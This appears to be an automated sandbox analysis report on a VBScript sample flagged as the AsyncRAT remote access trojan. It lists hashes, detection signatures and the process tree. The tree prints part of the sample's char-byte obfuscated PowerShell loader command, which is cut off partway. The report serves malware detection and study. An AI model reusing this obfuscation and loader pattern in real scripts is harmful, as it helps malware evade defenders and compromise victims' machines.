Edit tour
Windows
Analysis Report
H#0813-186765.vbs
Overview
General Information
| Sample name: | H#0813-186765.vbs |
| Analysis ID: | 1532152 |
| MD5: | 1ad458edaf24cc5d33db3978b18d446c |
| SHA1: | 3ee17340104e4ac3d95c96b35bbe32a3f0c0f56a |
| SHA256: | 42dbdf691f31f25bc8da8504d82bfeb4508d30c982ff3c56c89e98d6692a8a77 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
AsyncRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Loading BitLocker PowerShell Module
Sigma detected: Potential AMSI COM Server Hijacking
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 572 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\H#081 3-186765.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 4844 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $var1 = $( [char]([by te]0x20)+[ char]([byt e]0x5b)+[c har]([byte ]0x52)+[ch ar]([byte] 0x65)+[cha r]([byte]0 x66)+[char ]([byte]0x 6c)+[char] ([byte]0x6 5)+[char]( [byte]0x63 )+[char]([ byte]0x74) +[char]([b yte]0x69)+ [char]([by te]0x6f)+[ char]([byt e]0x6e)+[c har]([byte ]0x2e)+[ch ar]([byte] 0x41)+[cha r]([byte]0 x73)+[char ]([byte]0x 73)+[char] ([byte]0x6 5)+[char]( [byte]0x6d )+[char]([ byte]0x62) +[char]([b yte]0x6c)+ [char]([by te]0x79)+[ char]([byt e]0x5d)+[c har]([byte ]0x3a)+[ch ar]([byte] 0x3a)+[cha r]([byte]0 x6c)+[char ]([byte]0x 6f)+[char] ([byte]0x6 1)+[char]( [byte]0x64 )+[char]([ byte]0x77) +[char]([b yte]0x69)+ [char]([by te]0x74)+[ char]([byt e]0x68)+[c har]([byte ]0x50)+[ch ar]([byte] 0x61)+[cha r]([byte]0 x72)+[char ]([byte]0x 74)+[char] ([byte]0x6 9)+[char]( [byte]0x61 )+[char]([ byte]0x6c) +[char]([b yte]0x4e)+ [char]([by te]0x61)+[ char]([byt e]0x6d)+[c har]([byte ]0x65)+[ch ar]([byte] 0x28)+[cha r]([byte]0 x22)+[char ]([byte]0x 4d)+[char] ([byte]0x6 9)+[char]( [byte]0x63 )+[char]([ byte]0x72) +[char]([b yte]0x6f)+ [char]([by te]0x73)+[ char]([byt e]0x6f)+[c har]([byte ]0x66)+[ch ar]([byte] 0x74)+[cha r]([byte]0 x2e)+[char ]([byte]0x 56)+[char] ([byte]0x6 9)+[char]( [byte]0x73 )+[char]([ byte]0x75) +[char]([b yte]0x61)+ [char]([by te]0x6c)+[ char]([byt e]0x42)+[c har]([byte ]0x61)+[ch ar]([byte] 0x73)+[cha r]([byte]0 x69)+[char ]([byte]0x 63)+[char] ([byte]0x2 2)+[char]( [byte]0x29 )+[char]([ byte]0x20) +[char]([b yte]0x7c)+ [char]([by te]0x20)+[ char]([byt e]0x4f)+[c har]([byte ]0x75)+[ch ar]([byte] 0x74)+[cha r]([byte]0 x2d)+[char ]([byte]0x 4e)+[char] ([byte]0x7 5)+[char]( [byte]0x6c )+[char]([ byte]0x6c) +[char]([b yte]0x20)+ [char]([by te]0x3b)+[ char]([byt e]0x73)+[c har]([byte ]0x6c)+[ch ar]([byte] 0x65)+[cha r]([byte]0 x65)+[char ]([byte]0x 70)+[char] ([byte]0x2 0)+[char]( [byte]0x2d )+[char]([ byte]0x73) +[char]([b yte]0x20)+ [char]([by te]0x34)+[ char]([byt e]0x20)+[c har]([byte ]0x3b)+[ch ar]([byte] 0x20)+[cha r]([byte]0 x24)+[char ]([byte]0x 76)+[char] ([byte]0x6 1)+[char]( [byte]0x72 )+[char]([ byte]0x20) +[char]([b yte]0x3d)+ [char]([by te]0x20)+[ char]([byt e]0x20)+[c har]([byte ]0x5b)+[ch ar]([byte] 0x4d)+[cha r]([byte]0 x69)+[char ]([byte]0x 63)+[char] ([byte]0x7 2)+[char]( [byte]0x6f )+[char]([ byte]0x73) +[char]([b yte]0x6f)+ [char]([by te]0x66)+[ char]([byt e]0x74)+[c har]([byte ]0x2e)+[ch ar]([byte] 0x56)+[cha r]([byte]0 x69)+[char ]([byte]0x 73)+[char] ([byte]0x7 5)+[char]( [byte]0x61 )+[char]([ byte]0x6c) +[char]([b yte]0x42)+ [char]([by te]0x61)+[ char]([byt e]0x73)+[c har]([byte ]0x69)+[ch ar]([byte] 0x63)+[cha r]([byte]0 x2e)+[char ]([byte]0x